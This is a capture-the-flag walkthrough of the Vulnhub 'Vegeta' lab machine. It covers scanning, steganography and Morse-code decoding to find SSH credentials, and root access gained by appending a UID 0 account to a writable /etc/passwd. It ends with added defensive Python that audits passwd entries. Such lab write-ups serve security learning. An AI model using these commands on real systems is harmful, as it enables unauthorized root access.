Vulnhub: Detailed Walkthrough of the Vegeta Target Machine
Vegeta
Identifying the Target Host's IP Address
┌──(kali㉿kali)-[~/Vulnhub/Vegeta]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:06 1 60 Unknown vendor
192.168.56.100 08:00:27:b2:b4:d3 1 60 PCS Systemtechnik GmbH
192.168.56.147 08:00:27:12:e1:97 1 60 PCS Systemtechnik GmbH
Using the netdiscover tool on Kali Linux, the target host's IP address is identified as 192.168.56.147.
NMAP Scan
┌──(kali㉿kali)-[~/Vulnhub/Vegeta]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.147 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-03 20:09 EST
Nmap scan report for bogon (192.168.56.147)
Host is up (0.00020s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 1f3130673f08302e6daee3209ebd6bba (RSA)
| 256 7d8855a86f56c805a47382dcd8db4759 (ECDSA)
|_ 256 ccdede4e84a891f51ad6d2a62e9e1ce0 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:12:E1:97 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.02 seconds
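The NMAP scan results show that the target host has 2 open ports: 22 (ssh) and 80 (http).
Getting a Shell
Browsing to port 80 from Kali Linux returns a page that contains an image; download it to the local Kali Linux machine: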
┌──(kali㉿kali)-[~/Vulnhub/Vegeta]
└─$ ls
nmap_full_scan vegeta1.jpg
┌──(kali㉿kali)-[~/Vulnhub/Vegeta]
└─$ steghide extract -sf vegeta1.jpg
Enter passphrase:
┌──(kali㉿kali)-[~/Vulnhub/Vegeta]
└─$ stegseek vegeta1.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.44% (132.7 MB)
[!] error: Could not find a valid passphrase.
┌──(kali㉿kali)-[~/Vulnhub/Vegeta]
└─$ exiftool vegeta1.jpg
ExifTool Version Number : 12.52
File Name : vegeta1.jpg
Directory : .
File Size : 46 kB
File Modification Date/Time : 2023:03:03 20:11:09-05:00
File Access Date/Time : 2023:03:03 20:12:26-05:00
File Inode Change Date/Time : 2023:03:03 20:11:09-05:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Image Width : 1500
Image Height : 844
Encoding Process : Progressive DCT, Huffman coding
Bits Per Sample : 8
Color Components : 1
Image Size : 1500x844
Megapixels : 1.3
┌──(kali㉿kali)-[~/Vulnhub/Vegeta]
└─$ binwalk -e vegeta1.jpg
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
Analysis of the image yields nothing of value.
┌──(kali㉿kali)-[~/Vulnhub/Vegeta]
└─$ curl http://192.168.56.147/robots.txt
*
/find_me
┌──(kali㉿kali)-[~/Vulnhub/Vegeta]
└─$ curl http://192.168.56.147/find_me
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://192.168.56.147/find_me/">here</a>.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.147 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Vulnhub/Vegeta]
└─$ curl http://192.168.56.147/find_me/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /find_me</title>
</head>
<body>
<h1>Index of /find_me</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="find_me.html">find_me.html</a></td><td align="right">2020-06-28 19:16 </td><td align="right">3.8K</td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.147 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Vulnhub/Vegeta]
└─$ curl http://192.168.56.147/find_me/find_me.html
<html>
<head> Vegeta-1.0 </head>
<body></body>
</html>
<!-- aVZCT1J3MEtHZ29BQUFBTlNVaEVVZ0FBQU1nQUFBRElDQVlBQUFDdFdLNmVBQUFIaGtsRVFWUjRuTzJad1k0c09RZ0U1LzkvK3UyMU5TdTdCd3JTaVN0QzhoR2M0SXBMOTg4L0FGanljem9BZ0RNSUFyQUJRUUEySUFqQUJnUUIySUFnQUJzUUJHQURnZ0JzUUJDQURRZ0NzQUZCQURhRUJmbjUrUmwvbk9aTFAxeER6K3g5VTA1cWJoWjFkcjRzSFQyejkwMDVxYmxaMU5uNXNuVDB6TjQzNWFUbVpsRm41OHZTMFRONzM1U1RtcHRGblowdlMwZlA3SDFUVG1wdUZuVjJ2aXdkUGJQM1RUbXB1Vm5VMmZteWRQVE0zamZscE9hdVhKUVRUamxkSHZ0YmxvNDZOUWp5UjV4eUlvZ09CUGtqVGprUlJBZUMvQkdubkFpaUEwSCtpRk5PQk5HQklIL0VLU2VDNkVDUVArS1VFMEYwakJWRS9aSGM4SEhkUHZ1RWQwZVF3N003MWFtelRIaDNCRGs4dTFPZE9zdUVkMGVRdzdNNzFhbXpUSGgzQkRrOHUxT2RPc3VFZDBlUXc3TTcxYW16VEhoM0JEazh1MU9kT3N1RWQwZVFJcWJNNENUcmhKMGhTQkZUWmtDUUdBaFN4SlFaRUNRR2doUXhaUVlFaVlFZ1JVeVpBVUZpSUVnUlUyWkFrQmdJVXNTVUdSQWtCb0lVMFRHZjAxN2UrdTRJVXNScEtSRGtXYzVsdjNEQlN4ZjFqZE5TSU1pem5NdCs0WUtYTHVvYnA2VkFrR2M1bC8zQ0JTOWQxRGRPUzRFZ3ozSXUrNFVMWHJxb2I1eVdBa0dlNVZ6MkN4ZThkRkhmT0MwRmdqekx1ZXdYTGhCL2VGazZjcm84Mm9rc2IzMTNCQkgwdkNITFc5OGRRUVE5YjhqeTFuZEhFRUhQRzdLODlkMFJSTkR6aGl4dmZYY0VFZlM4SWN0YjN4MUJCRDF2eVBMV2R5OFZaTXJwV1BDYjY2YWNEQWdTbUkrNjJTY0RnZ1RtbzI3MnlZQWdnZm1vbTMweUlFaGdQdXBtbnd3SUVwaVB1dGtuQTRJRTVxTnU5c25nOVNPMkFjcmxQN212SXd2OEg3YjVDd1NCVDlqbUx4QUVQbUdidjBBUStJUnQvZ0pCNEJPMitRc0VnVS9ZNWk4UUJENlIvUS9pMURPTFU4OHBkV3FxY3lKSTBlenFubFBxMUNBSWdveXFVNE1nQ0RLcVRnMkNJTWlvT2pVSWdpQ2o2dFFnQ0lLTXFsTnpYQkExYnhZeWk5TU1UbStVeWwvZXNSZ0VpZU0wZzlNYnBmS1hkeXdHUWVJNHplRDBScW44NVIyTFFaQTRUak00dlZFcWYzbkhZaEFranRNTVRtK1V5bC9lc1JnRWllTTBnOU1icGZLWGR5d0dRZUk0emVEMFJxbjhwYzJTUTcxWkFxZlpwd2pTVWJmc2w2cEtoRU1RajV3SUVzeWZxa3FFUXhDUG5BZ1N6SitxU29SREVJK2NDQkxNbjZwS2hFTVFqNXdJRXN5ZnFrcUVReENQbkFnU3pKK3FTb1JERUkrY0NCTE1uNm9xRHVleWpLNmVhcHdFNmNpWjdabkttS29xRHVleWpLNmVhaEFFUVI3VnFYdXFRUkFFZVZTbjdxa0dRUkRrVVoyNnB4b0VRWkJIZGVxZWFoQUVRUjdWcVh1cVFaQ0JncWcvNWpmZjEvRngzUzdXOHE2cHdia1BRUkNFK3hDa01HZnFycW5CdVE5QkVJVDdFS1F3WitxdXFjRzVEMEVRaFBzUXBEQm42cTdLY0ZtY0hzYnBvM1RLMlpGbEFnaHlPQXVDZUlNZ2g3TWdpRGNJY2pnTGduaURJSWV6SUlnM0NISTRDNEo0Z3lDSHN5Q0lONldDM1A0d1RvL3RKTEo2TDhvc0NGSjBueG9FUVpDMkxCMzNxVUVRQkduTDBuR2Z
HZ1JCa0xZc0hmZXBRUkFFYWN2U2NaOGFCRUdRdGl3ZDk2bEJrSUdDZE5TcGUyYnZVMzk0Nm5mb3lPazAzN0pmdU1Ba2VGZlA3SDFPSDE3MlBuVk9wL21XL2NJRkpzRzdlbWJ2Yy9yd3N2ZXBjenJOdCt3WExqQUozdFV6ZTUvVGg1ZTlUNTNUYWI1bHYzQ0JTZkN1bnRuN25ENjg3SDNxbkU3ekxmdUZDMHlDZC9YTTN1ZjA0V1h2VStkMG1tL1pMMXhnRXJ5clovWStwdzh2ZTU4NnA5Tjh5MzdoQXZHSGZzUHlPN0pNMmFkNlp3aGkrbWdkODkyd1R3UzU3RUU3WmtjUUJMbm1RVHRtUnhBRXVlWkJPMlpIRUFTNTVrRTdaa2NRQkxubVFUdG1SNUFYQ1hJNzZnKzJBN1dRSFZrNnhFcmxUMVZkRElKNFpFRVFVeERFSXd1Q21JSWdIbGtReEJRRThjaUNJS1lnaUVjV0JERUZRVHl5akJXa1kyRDFjV0xLQitUeXdYNERRUkFFUVlUM0ljaGhFS1FXQkVFUUJCSGVoeUNIUVpCYUVBUkJFRVI0SDRJY0JrRnFzUmJFaVk2Y04zek1UaCtzK28xUy9VNEg2QUpCRUFSQk5pQUlnaURJQmdSQkVBVFpnQ0FJZ2lBYkVBUkJFR1FEZ2lESUtFRnUrTGc2NW5QSzRuVFV1MTdlRlM0d2VqUjF6bzc1bkxJNEhmV3VsM2VGQzR3ZVRaMnpZejZuTEU1SHZldmxYZUVDbzBkVDUreVl6eW1MMDFIdmVubFh1TURvMGRRNU8rWnp5dUowMUx0ZTNoVXVNSG8wZGM2TytaeXlPQjMxcnBkM2hRdU1IazJkczJNK3B5eE9SNzNyNVYzaEFxTkhVK2QwMnN1VUxOTnpJb2h4M1ExWnB1ZEVFT082RzdKTXo0a2d4blUzWkptZUUwR002MjdJTWowbmdoalgzWkJsZWs0RU1hNjdJY3YwbkFoU3hKUVoxRDJuZkMvTEhKWExjQm9ZUVR4NlR2bGVsamtxbCtFME1JSjQ5Snp5dlN4elZDN0RhV0FFOGVnNTVYdFo1cWhjaHRQQUNPTFJjOHIzc3N4UnVReW5nUkhFbytlVTcyV1pvM0laVGdNamlFZlBLZC9MTWtmbE1weVk4bEVxSC9zSlRoODZnaFNBSUxVZ1NQT2kxQ0JJTFFqU3ZDZzFDRklMZ2pRdlNnMkMxSUlnell0U2d5QzFJRWp6b3RRZ1NDMElVckNvS1NjN245TmVzcHplZmNVTTJmbFMvU29EVERrZEMzYWF3U2tuZ2d3OEhRdDJtc0VwSjRJTVBCMExkcHJCS1NlQ0REd2RDM2Fhd1NrbmdndzhIUXQybXNFcEo0SU1QQjBMZHByQktlZnJCQUY0RXdnQ3NBRkJBRFlnQ01BR0JBSFlnQ0FBR3hBRVlBT0NBR3hBRUlBTkNBS3dBVUVBTmlBSXdBWUVBZGp3SHlVRnd2VnIwS3ZGQUFBQUFFbEZUa1N1UW1DQw== -->
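The returned page contains an encoded comment that needs to be Base64-decoded. The decoded result still appears to be encoded; it is in fact another layer of Base64. Decoding that second layer yields an image, which turns out to be a QR code:
Scanning it gives: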
Password: topshellv
┌──(kali㉿kali)-[~/Vulnhub/Vegeta]
└─$ file dehash
dehash: PNG image data, 200 x 200, 8-bit/color RGBA, non-interlaced
┌──(kali㉿kali)-[~/Vulnhub/Vegeta]
└─$ nikto -h http://192.168.56.147
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.147
+ Target Hostname: 192.168.56.147
+ Target Port: 80
+ Start Time: 2023-03-03 20:43:14 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 77, size: 5a9262e9632c0, mtime: gzip
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS
+ OSVDB-3268: /admin/: Directory indexing found.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3268: /image/: Directory indexing found.
+ OSVDB-9624: /admin/admin.php?adminpy=1: PY-Membres 4.2 may allow administrator access.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7915 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2023-03-03 20:43:31 (GMT-5) (17 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
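Although nikto found the /admin/ directory and /login.php, neither appears to display properly.
Although the QR code image revealed a password earlier, it is not known which service or which user it belongs to.
┌──(kali㉿kali)-[~/Vulnhub/Vegeta]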
└─$ gobuster dir -u http://192.168.56.147 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.147
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: html,txt,sh,php
[+] Timeout: 10s
===============================================================
2023/03/03 21:26:07 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 119]
/img (Status: 301) [Size: 314] [--> http://192.168.56.147/img/]
/login.php (Status: 200) [Size: 0]
/image (Status: 301) [Size: 316] [--> http://192.168.56.147/image/]
/admin (Status: 301) [Size: 316] [--> http://192.168.56.147/admin/]
/manual (Status: 301) [Size: 317] [--> http://192.168.56.147/manual/]
/robots.txt (Status: 200) [Size: 11]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
/bulma (Status: 301) [Size: 316] [--> http://192.168.56.147/bulma/]
/logitech-quickcam_W0QQcatrefZC5QQfbdZ1QQfclZ3QQfposZ95112QQfromZR14QQfrppZ50QQfsclZ1QQfsooZ1QQfsopZ1QQfssZ0QQfstypeZ1QQftrtZ1QQftrvZ1QQftsZ2QQnojsprZyQQpfidZ0QQsaatcZ1QQsacatZQ2d1QQsacqyopZgeQQsacurZ0QQsadisZ200QQsaslopZ1QQsofocusZbsQQsorefinesearchZ1.html (Status: 403) [Size: 279]
Progress: 6367997 / 6369170 (99.98%)======================================================
After switching to a different wordlist, the scan finally found the /bulma directory. Browsing to it shows a WAV file; download it to Kali Linux:
┌──(kali㉿kali)-[~/Vulnhub/Vegeta]
└─$ mv ~/Downloads/hahahaha.wav .
┌──(kali㉿kali)-[~/Vulnhub/Vegeta]
└─$ ls
con dehash hahahaha.wav nmap_full_scan vegeta1.jpg
Decode the audio file (Morse code) with an online site by uploading hahahaha.wav to:
https://morsecode.world/international/decoder/audio-decoder-expert.html
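This finally yields the username trunks and the password u$3r (Morse code does not distinguish upper and lower case for English letters; the username and password were worked out by trial).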
┌──(kali㉿kali)-[~/Vulnhub/Vegeta]
└─$ ssh trunks@192.168.56.147
The authenticity of host '192.168.56.147 (192.168.56.147)' can't be established.
ED25519 key fingerprint is SHA256:rsXPQiqA/9/evxX6rCmmUEw19kPNCvB8JB0r8rYuXR4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.147' (ED25519) to the list of known hosts.
trunks@192.168.56.147's password:
Linux Vegeta 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jun 28 21:16:00 2020 from 192.168.43.72
trunks@Vegeta:~$ id
uid=1000(trunks) gid=1000(trunks) groups=1000(trunks),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
trunks@Vegeta:~$ sudo -l
-bash: sudo: command not found
trunks@Vegeta:~$ ls -alh
total 28K
drwxr-xr-x 3 trunks trunks 4.0K Jun 28 2020 .
drwxr-xr-x 3 root root 4.0K Jun 28 2020 ..
-rw------- 1 trunks trunks 382 Jun 28 2020 .bash_history
-rw-r--r-- 1 trunks trunks 220 Jun 28 2020 .bash_logout
-rw-r--r-- 1 trunks trunks 3.5K Jun 28 2020 .bashrc
drwxr-xr-x 3 trunks trunks 4.0K Jun 28 2020 .local
-rw-r--r-- 1 trunks trunks 807 Jun 28 2020 .profile
trunks@Vegeta:~$ cat .bash_history
perl -le ‘print crypt(“Password@973″,”addedsalt”)’
perl -le 'print crypt("Password@973","addedsalt")'
echo "Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd[/sh]
echo "Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd
ls
su Tom
ls -la
cat .bash_history
sudo apt-get install vim
apt-get install vim
su root
cat .bash_history
exit
trunks@Vegeta:~$
Privilege Escalation
Upload the linpeas.sh script to the /tmp directory on the target host, make it executable, and run it. The (partial) output shows:
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ /etc/passwd is writable
═╣ Credentials in fstab/mtab? ........... No
A password can be created, and the password and username information then written into the /etc/passwd file:
trunks@Vegeta:/tmp$ echo 'rjason:$6$jason$h5DlgYsVif/enQPTm/CgJ54tpQaPz0fwOmjoJKkTXi.EZ4Z6IOesX4REn/Dq8mXA4povr6tGXPy16EAcN.Ln41:0:0:root:/root:/bin/bash' >> /etc/passwd
trunks@Vegeta:/tmp$ su - jason
su: user jason does not exist
trunks@Vegeta:/tmp$ su - rjason
Password:
root@Vegeta:~# cd /root
root@Vegeta:~# ls -alh
total 32K
drwx------ 3 root root 4.0K Jun 28 2020 .
drwxr-xr-x 18 root root 4.0K Jun 28 2020 ..
-rw------- 1 root root 186 Jun 28 2020 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4.0K Jun 28 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 1.4K Jun 28 2020 root.txt
-rw------- 1 root root 1.8K Jun 28 2020 .viminfo
root@Vegeta:~# cat root.txt
, ,'|
,/|.-' \.
.-' ' |.
, .-' |
/|,' |'
/ ' | ,
/ ,'/
. | _ /
\`' .-. ,' `. |
\ / \ / \ /
\| V | | ,
( ) /.--. ''"/
"b.`. ,' _.ee'' 6)| ,-'
\"= --"" ) ' /.-'
\ / `---" ."|'
V E G I I T A \"..- .' |.
`-__..-',' |
_.) ' .-'/ /\.
.--'/----..--------. _.-""-.
.-') \. / _..-' _.-'--.
/ -'/ """"""""" ,'-. . `.
| ' / / ` `. \
| | | | |
\ .'\ | \ |
/ ' | ,' . - \`. | / /
/ / | | `/"--. -' /\
| | \ \ / \ |
| \ | \ .-| | |
Hurray you got root
Share your screenshot in telegram : https://t.me/joinchat/MnPu-h3Jg4CrUSCXJpegNw
root@Vegeta:~#
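From the defender's side, the condition exploited above (a writable /etc/passwd that accepts an inline hash and a second UID 0 account) can be checked for directly. The following is an added example, not part of the original walkthrough; the function names and the sample file content are assumptions made for illustration.

```python
import stat

# Constructed sample of /etc/passwd content. The "Tom" entry is the line
# recorded in the .bash_history shown above; the rest are typical defaults.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
trunks:x:1000:1000:trunks,,,:/home/trunks:/bin/bash
Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash
"""


def passwd_mode_is_unsafe(mode: int) -> bool:
    """True if group or others may write the file (the usual mode is 0644)."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_passwd(text: str):
    """Return (line_no, user, finding) tuples for risky passwd entries."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line_no, fields[0], "malformed entry"))
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        # Field 2 is normally "x" (hash kept in /etc/shadow) or a lock marker.
        if pw == "":
            findings.append((line_no, user, "empty password field"))
        elif pw not in ("x", "*", "!"):
            findings.append((line_no, user, "password hash stored in passwd"))
        # Any account other than root with UID 0 has full root privileges.
        if uid == "0" and user != "root":
            findings.append((line_no, user, "UID 0 account other than root"))
    return findings


if __name__ == "__main__":
    print("mode 0666 unsafe:", passwd_mode_is_unsafe(0o100666))
    for finding in audit_passwd(SAMPLE_PASSWD):
        print(finding)
```

On a live host, pass `os.stat("/etc/passwd").st_mode` to `passwd_mode_is_unsafe` and the file's text to `audit_passwd`.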
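Lessons Learned
- Data obtained by Base64 decoding may itself still be Base64-encoded, and if the original file is an image it will look like garbage at that point. It is therefore best to decode a second time, write the output to a file, and check the file's content with the file command.
- The password in this machine's QR code is actually a rabbit hole. The key is to discover the directory by scanning and to analyze the audio file. The wordlist used this time was: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt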
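The layered decoding described for the find_me.html comment, and again in the first lesson above, can be automated: strip Base64 layers until the bytes start with a known file signature. This is an added example, not part of the original walkthrough; the function names, the signature table and the constructed sample are assumptions.

```python
import base64
import binascii

# Magic numbers for a few common file types (a small illustrative subset).
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
    b"GIF8": "gif",
    b"RIFF": "riff (wav/avi/webp)",
    b"PK\x03\x04": "zip",
}


def identify(data: bytes):
    """Return a file-type name if data starts with a known magic number."""
    for magic, name in MAGIC.items():
        if data.startswith(magic):
            return name
    return None


def peel_base64(blob: bytes, max_layers: int = 5):
    """Strip Base64 layers until a known file type appears or decoding fails.

    Returns (layers_removed, file_type_or_None, remaining_bytes).
    """
    data, layers = blob, 0
    while layers < max_layers and identify(data) is None:
        try:
            # validate=True rejects bytes outside the Base64 alphabet, so
            # binary data or ordinary text is not "decoded" into garbage.
            decoded = base64.b64decode(b"".join(data.split()), validate=True)
        except (binascii.Error, ValueError):
            break
        if not decoded:
            break
        data, layers = decoded, layers + 1
    return layers, identify(data), data


# Constructed sample: a PNG signature plus filler bytes, encoded twice,
# standing in for the comment found in find_me.html.
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
SAMPLE_COMMENT = base64.b64encode(base64.b64encode(SAMPLE_PNG))

if __name__ == "__main__":
    layers, kind, payload = peel_base64(SAMPLE_COMMENT)
    print(f"{layers} Base64 layer(s) removed, payload looks like: {kind}")
```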